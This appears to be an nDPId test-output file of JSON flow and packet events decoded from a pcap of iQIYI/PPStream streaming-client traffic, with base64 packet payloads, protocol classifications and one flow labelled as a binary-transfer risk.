00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1601,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197131,"flow_last_seen":1467353197131,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353197131,"l3_proto":"ip4","src_ip":"192.168.115.1","dst_ip":"239.255.255.250","src_port":50945,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1686,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":2,"flow_last_seen":1467353197240,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1467353197240,"pkt":"AQBef\/\/6dNArkea6CABFAACXc\/0AAAERIbXAqHMB7\/\/\/+scBB2wAg2oBTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOk1lZGlhU2VydmVyOjENCk1hbjoic3NkcDpkaXNjb3ZlciINCk1YOjMNCg0K"} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1687,"source":"pps.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":3,"flow_last_seen":1467353197271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1467353197271,"pkt":"AQBef\/\/6dNArkea6CABFAACZc\/4AAAERIbLAqHMB7\/\/\/+scBB2wAhQmdTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOk1lZGlhUmVuZGVyZXI6MQ0KTWFuOiJzc2RwOmRpc2NvdmVyIg0KTVg6Mw0KDQo="} 
-00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1467353197951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAAUUM2tAAIAGCK3AqHMIb84WTcZbAFDJCjAgTd\/tYVAQAQRxYwAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MjAxJmN0PWNsdF9fcGxfcGxheSZhbGJ1bV9pZD0xODA5MzIzMDEmYzE9NDc5NTMxMDAwJmNsdD1ob21lZGwmY249MTYwNTA1LSVFNiVBRCVBMyVFNyU4OSU4NyVFRiVCQyU5QSVFOSU4MyU5MSVFNiU4MSVCQSVFNiVBQyVBNyVFNSVCNyVCNCVFNCVCQSU4QyVFNiVBQyVBMSVFNSVCRCU5MiVFNiU5RCVBNSVFNSU4RiU4RCVFOSU4MCU4NiVFOCVBMiVBRC0lRTQlQkIlOEElRTYlOTklOUE4MCVFNSU5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZjcHV1c2U9MTQuMSZkZT0zMmU2NTRmYTU3YmU5MGVjNjM4YzQ2ZGRmZGQ2Njc1NyZkbGx2PWFwcHYlM0Q1LjAuMC4xMDAzJTdDb2x2JTNENS4wLjAuMTEwMSZldD0wJmZ0PTIxNzUmaHQ9MCZodT0tMSZpc2RtPTAmaXNsb2NhbD0wJmt2PTEwLjAuMC4yOTMmbGFuZz0mbWVtcGh5PTY3Jm1lbXZpcj0xMjEmbXQ9MCZtdj01LjIuMTUuMjI0MCZwMj0xMDExJnBlPSZwb3B0PTAmcHQ9MiZwdHlwZT0xJnB1PSZyPTQ3OTUzMTAwMCZyX2lkPTQ3OTUzMTAwMCZyYT0xJnJuPTIzOTg3JnNjaG5faWQ9MjAwMDAzNzE5JTI0JTI0JTI0JTI0MTgwOTMyMzAxJnNjaG5fbmFtZT0lRTclQkIlQkMlRTglODklQkElRTUlQTglQjElRTQlQjklOTAlMjQlMjQlMjQlMjQlRTQlQkIlOEElRTYlOTklOUE4MCVFNSU
5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZzcHQ9MTQ2NzM1MzE5NyZzdGltZT0wJnR2aWQ9NDc5NTMxMDAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdXBsb2FkX2lkPSZ1cmw9aHR0cCUzQSUyRiUyRnd3dy5pcWl5aS5jb20lMkZ2XzE5cnJsdnV4bGcuaHRtbCZ2PTIuMC4xMDIuMzAxNDcmdmU9MzMzODI1Y2RmNDg2Y2M5NGI2ZDI5NTZmNGRlNmQ0Y2ImdmlkPTJiOTQ3MjllM2E5MjBiMjExOTg4NmM1YzY3N2FlOWRiJm1zZz1NWHcwZkFkUUFGSURVZ0ZSU0FCNmR3TmtCUUptZlhWM2RubGhZbmxJQlhUVnh5NGFPTDBBZEM2UVdSYURTS0IxY29kZGkxT3J0aUF6TmYzSDhwZUN2MUwlMkZSMiUyQjZUWUZEVXptSXA5b29TJTJGc3FRME50aEpLVDNBSHRDSkg2SmFLSGQxS2RwTDZwRVJ5bTBKM0FOUWxWUzluQWx3bGw2ciUyQjNMVzlpbXVHd2ZoNCUzRCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6"} -01934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7440000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": 
{"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=201&ct=clt__pl_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=14.1&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&isdm=0&islocal=0&kv=10.0.0.293&lang=&memphy=67&memvir=121&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=2&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=23987&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353197&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db&msg=MXw0fAdQAFIDUgFRSAB6dwNkBQJmfXV3dnlhYnlIBXTVxy4aOL0AdC6QWRaDSKB1coddi1OrtiAzNf3H8peCv1L%2FR2%2B6TYFDUzmIp9ooS%2FsqQ0NthJKT3AHtCJH6JaKHd1KdpL6pERym0J3ANQlVS9nAlwll6r%2B3LW9imuGwfh4%3D","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1467353197951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"thread_ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAABuM2xAAIAGDVLAqHMIb84WTcZbAFDJCjUMTd\/tYVAYAQQaAAAAIG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} 
-00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1997,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1467353198052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353198052,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0gHZAADMGDQJvzhZNwKhzCABQxltN3+1hyQo1UlAYACMO1AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1467353198532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353198532,"pkt":"TF4M6gNlABxCjnAxCABFAAEhM5pAAIAGSV3AqHMI3xpqFMZcAFDCryK2CgBK\/VAYAQQ7tAAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMi5qcGc\/bm89MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_2.jpg?no=2","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
-02166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1999,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1467353198595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJVAADgGwG\/fGmoUwKhzCABQxlwKAEr9wq8jr1AQAB\/+YwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozOCBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDY4MDQ1Mw0KQ29ubmVjdGlvbjogY2xvc2UNCkV4cGlyZXM6IEZyaSwgMDUgTWF5IDIwMTcgMTc6MzU6NTYgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KTGFzdC1Nb2RpZmllZDogVGh1LCAwNSBNYXkgMjAxNiAxNjoyMzo1NSBHTVQNClgtQ2FjaGU6IGZyb20gMTI3LjAuMC4xDQpBZ2U6IDQ4ODM0NDINClZpYTogaHR0cC8xLjEgUVRTIChRVFMgW2NIcyBmIF0pDQpYLUNhY2hlOiBmcm9tIDEwLjIyMS4zMi4yMTYNClgtQ2FjaGU6IE1JU1MgZnJvbSAyMjMuMjYuMTA2LjIwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAG8QAAEDAwMCBAMEBAgGDQUCHwECAwQFBhEAEiEHMQgTIkEUUWEVMnGBI0KRoQkWJFJyscHRJTNigsPwFyY0Q3OSssLE0tTh8TVThqKz0xg2RGODhIWTo6S0J1RkdHWURnYZN0VVVmVmlZbF4tUp\/8QAHQEAAgMBAQEBAQAAAAAAAAAABQYDBAcCAQgACf\/EAEcRAAIBAwMBBgMGAwcEAQMCBwECAwAEEQUSITEGEyJBUWEUcYEjMpGhsdEVweEHJDNCUmLwFiVy8SY0Q1NzNYKyosJjg9L\/2gAMAwEAAhEDEQA\/APMptJVH130SjzK1ODEJhT7nfaPYfU\/36sLbZpa5kcVlcxmmZPnLp7aFPYwcbQogZzjufnpudML6tTppWVy7NuK4oNWd+7OqUFmN5GAcbVNvOHnPOQB9dazqvexW8bxLlgK902GK6uRDM20HzpX9Quk14dJ6+mm3hbs635Lw8xn4xrah5PHqbX91wcpyUk9+dVO39FrVXio8T1teJOo0iFdEycw1Qk4p82j0xuVIUFNoS8h5S32knctsODaDjdjSXTR+mhR\/8EV3\/wCdb0Q\/9O132ZlLRu0gOSfSoNQiW2mMQOflzSwqSfu64U5Pq0xp1E6YHG+6LuT\/AOjUX\/t+umJROmSVei6rsV+Nsxv+36hl
Ufxbf5VSDjZ0oKmp\/Qq120RP8lV+OjiVR+nKm1brouhH\/ozGP\/T9fU2j9O0x1eXdVzrTnv8AxYj8f\/R+j\/fKmqCTB+6fKoi+UxQFTU+pz8TqJKZP2n+f9+mRBo\/Tncry7suVfJ\/\/AAYYH\/T9R36H02+L3Ku250q+"} -02175{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2000,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1467353198595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJZAADgGwG7fGmoUwKhzCABQxlwKAE\/pwq8jr1AQAB8TPwAAQtiP\/X8fofczLJZRL\/v\/AJ10rgMaH2Gf0Z1VVRnTPjUywEtnbclzqH\/4txv+36rp9H6bKz5tz3WP6Nsxj\/0\/TXrE0cmn7QD09DVaNjvoBpjfp1znU2VIcOxhxTO3cpxDZUEjnvgfQ9\/kdMGm0bpqlI2XLdrn\/o5FH\/T9HQ6yUG2uklRsGHVriXDly3XBJfo0UFplaUZbSBKJGVpWo+rH6Q8ZJ0lao8w0NVtwc5GeOMfOiVqYmnxKcCg6odBbrtWm0V+ox2Gm6o0XGFCU2spISpRQ4kEqaWEDdtWEn8+Nc5fQi6E7EFMNCluIaAMtGQpRwnPJ4ORydHnUzrNSes\/2KupyKzGZp0NDO+PSY6nZDqRtLrizKHcfvJ1Uzn6DNoUaGmnXP5aWkJakx7dYSp1KVbgorEkhWT3Iz31Qgve0ENiqumF8sjyo+kejk5Lkmq1fhC6hU9DqlM0xzccFLc9ClcKAPGP8odtLOv2vPs6vzKPUUoTMiq2u+UrekH6Ht+zTeVVqHU0T0NWpcm6WzjezbzSVoHqTvQQ7nPqwT+3Vr0XtGkXqK5FtuDc9TktNIVML8unxEoQd4QEl1RGSQc89wNRaRfTWzCa7P2a+f1qneLaFMW2S1Z3nt418lHoT+Gtf0\/wxVG94D1sU62a09IhOtMeWu5qQlYdU0h0cc7glDyCvafzJ1lao0ldLnTYT6C29FecYcRuC9qkKKVDI4OCDyANaFpeo2mrXEq27ZIFBGR41BcYodQCY6tSKJSJlZnCPBjqfe+8Up9h+P9+rC3GqUufH+2lzG6Zk+caelCnsYONoUQO+O5+em50yvu0umdZVMs64rip1Wd5TOqMNmP5GAcbVNuuHnPO4AfXSjqxlggSSJcsBRTTYYrq5EMzbQfOlb1E6TXh0kryKbeFuz7flPArZ+MaKUPp49Ta\/uuD1J5ST351UJb9OtW+KrxO2z4lKjR4d0TZzTVCTtp02jU5qTIUFtoS8l5a32knctsLG1JxuxnSURR+mpSn\/AA\/d6f8A5QxD\/wBN1x2ZlLJIzqck+lQ6hCLeXuwQcenNLCop241wgJ3uaZU2i9MDjfct3J\/9HIh\/6frpi0bpilz0XPdh\/G2ov\/b9cygfxbd5VSD+DFA0xH6PUijJ\/krn46NplG6cKbO66LpH4WzGP\/T9cqZSOnaWHPKue6Fc\/wD7Mxh\/0\/R8TKmqB8H7p8jUJbKYoCpbf6RzPz\/t1Ekt\/wCESPqNMaDRunO9zy7nuhfz\/wBrMf8A7frpfofTb4w7rqugOZ7fxZjH9\/x+hlzMr2US\/wC\/+ddK\/iPFDjDPp1VVNs86aLFM6fBO1Nx3Qf8A0c
jf9v1XzaN02P8Ajbmuwf0bai\/9v026vPFLp+1c9PQ1DGWDcil9SmztPOu6bTZMhYUhhxTIG5TiW1KCRz3wD\/qNHtOpHTNI\/RXDdzv\/AKOxU\/8ATjo5HWShW10lqVgw6ncTkOXLecTJk0mNlthaEZbAEknJWlajzj1n3J0l6o8x0RVtwc5GeOMfOiFr3bT4mOBQhUOgl1WpTaK\/UY0dpuqtFxgolNrUkhKlFDiAoqaVtGcLA\/brnK6FXQnCFIhoUtxLQCpSM7lHCQRk98jv20ddTes1M60fYqqm9WIrNOhts741LjqdkOgbS64syR3H7yc6qZ0mhzKDFi\/ZdylkMIQ1"} -00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2456,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1467353199417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1467353199417,"pkt":"ABxCjnAxTF4M6gNlCABFAAEF4D5AADEGSkB7fW9GwKhzCABQxlcB794psg4Z21AYPLiOgAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzggR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1467353200271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353200271,"pkt":"TF4M6gNlABxCjnAxCABFAAEhNFdAAIAGSKDAqHMI3xpqFMZdAFCAFVM2Sak8SVAYAQQb1wAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMy5qcGc\/bm89MyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7440000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_3.jpg?no=3","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKADCuCpAADIG5SVN6ikjwKhzCABQwBY\/zyZ9xn1A6VAYAAIAJQAASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtY29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQoNCg=="} -00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": 
{"total":250,"client":225,"server":25}}},"proto":"Unknown","breed":"Unrated","category":"Download"}} -02158{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2551,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1467353202192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKAUUuCtAADIG4NJN6ikjwKhzCABQwBY\/zycXxn1A6VAQAAL1DgAAMjINCgMgCKAEEgH\/MhgIBBDmzNlDGIAKIJuhw6jaKiibocOo2ioNCjllMw0KCuATQVNVIVZQU3oDMAYWRgAAAIAJAACTCQAAeNolVXk01V0bfe51iZApMpZ5zjznco0JmeKSIVNeQzKWkDi4Ggwp6UWG1xCxylQRmd6EyCykZKZ0QwiR4vt933fWOuv8cdbZZ5\/9PPvsM3aGIkkMAEZWqjKV8P\/xCJtSB\/NfKOBwomAIFoTLeF+yLcHOykHRDpzBBXxpwIr2Eh5YEZ6EJCLl8EBQxQO\/OhBpYJqkQwMkvZMEQQA3f4Kc7yWvi\/jwS+HAHykF2jRQpasDRv9DcaOBVd0wDIWCO8DvhxfF8YuBBJwikABIjuCE3RKUjAuHSOCNFAIREAUxUMADmUQDQIgCRPgvVUt9JRlWbNXtK5OpsKHJ8J4LK+EyngYrIxUZVhyAmg4FaJkIoGZU33trc5hjTzGJTtUKB9Mx+T3dfmPXIoQ26EABICX6SsW7hX2KlFgnEwnwoJmVWZtN5T3KOpChrYrh213iQtqdReQAD1v9dk08JJYJFluOWyXS+Qf73GcByDko2exVaBzzKIPoSxuJ8RHb72m1UeUvkD\/v216FhyZVmZihHr7WtrYrgarCACFHcqOl7rTojtTlpFlxAKROdfbFzNGM6rxNqVIdOAHcm\/os5hLX